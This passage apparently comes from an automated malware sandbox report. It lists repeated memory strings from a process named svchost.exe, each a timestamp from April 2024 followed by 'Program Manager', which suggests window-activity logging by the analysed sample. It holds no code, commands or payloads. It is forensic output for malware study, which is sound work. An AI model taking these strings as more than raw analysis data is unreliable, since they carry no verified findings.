              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:47:45 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/20 | 22:41:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:57:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:22:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:50:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:34:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:31:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:42:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:13:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:52:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:21:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:58:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:19:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:09:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:08:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:26:21 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:48:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:38:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:14:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:58:25 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:46:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:24:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:06:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:06:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:30:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:35:55 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:18:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:57:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:34:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:07:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:08:59 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:45:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:24:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:43:59 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:23:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:32:42 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:42:01 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:53:18 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:13:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:19:20 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:32:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:59:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:11:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:27:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:38:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:35:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:47:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:09:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:53:09 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:50:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:19:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:19:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:45:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:00:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:02:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:27:33 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:27:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:35:46 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:10:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:37:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:41:15 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:16:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 18:33:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:31:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 20:56:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:58:07 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:38:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:07:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:48:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 14:22:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:36:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:15:23 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:02:14 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:46:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:07:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:33:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:23:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:54:39 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:35:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:08:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:02:32 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:36:29 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/24 | 00:03:48 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:08:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:55:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:15:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:22:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:18:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:23:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:28:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:17:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:15:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:26:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:23:56 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:31:41 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:44:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:39:05 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:25:11 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:41:00 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:12:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:15:52 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:22:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:47:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:45:53 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:12:47 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:41:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:55:12 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:49:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 07:37:30 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:39:43 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:55:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:45:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:24:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:36:19 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:03:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:20:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:03:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:53:38 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 13:49:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 19:56:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:09:50 - Program Manager
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:12:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:58:44 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:01:31 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 10:01:34 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:53:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:34:54 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:10:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:25:49 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:44:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:45:24 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:27:13 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:52:17 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:27:04 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:00:10 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 18:01:37 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:45:51 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:57:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 05:29:36 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:32:22 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:08:03 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:37:49 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:24:28 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 03:47:08 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 04:56:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:11:57 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:36:58 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:40:26 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 06:05:27 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:21:16 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 22:25:30 - Program Manager
